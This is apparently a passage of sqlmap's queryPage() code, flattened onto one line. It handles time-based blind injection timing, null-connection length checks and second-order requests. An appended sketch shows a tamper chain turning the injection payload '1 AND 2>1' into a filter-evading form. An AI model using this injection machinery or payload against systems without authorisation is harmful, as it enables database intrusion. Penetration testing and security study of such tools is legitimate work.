singleTimeWarnMessage(warnMsg) warnMsg = "time-based comparison needs larger statistical " warnMsg += "model. Making a few dummy requests, please wait.." singleTimeWarnMessage(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "there is considerable lagging " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "%d or more)" % (conf.timeSec * 2) logger.critical(warnMsg) elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter's " warnMsg += "bandwidth during usage of time-based queries" singleTimeWarnMessage(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: if not auxHeaders: auxHeaders = {} auxHeaders[HTTPHEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404) if headers: if kb.nullConnection == NULLCONNECTION.HEAD and HTTPHEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTPHEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTPHEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTPHEADER.CONTENT_RANGE][headers[HTTPHEADER.CONTENT_RANGE].find('/') + 1:]) if not pageLength: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) if conf.secondOrder: page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastRequestDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) elif pageLength or page: return comparison(page, headers, code, getRatioValue, pageLength) else: return False
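A minimal sketch of the tamper-chain validation near the top of this queryPage() variant, assuming tamper callables accept a payload keyword argument and return the rewritten payload; the exception type used here is generic, not sqlmap's.

def apply_tampers(payload, tamper_functions):
    for tamper in tamper_functions:
        payload = tamper(payload=payload)
        if not isinstance(payload, str):
            raise ValueError("tamper function '%s' returned %s instead of a string"
                             % (getattr(tamper, "__name__", "?"), type(payload)))
    return payload

# e.g. apply_tampers("1 AND 2>1", [lambda payload: payload.replace(" ", "/**/")])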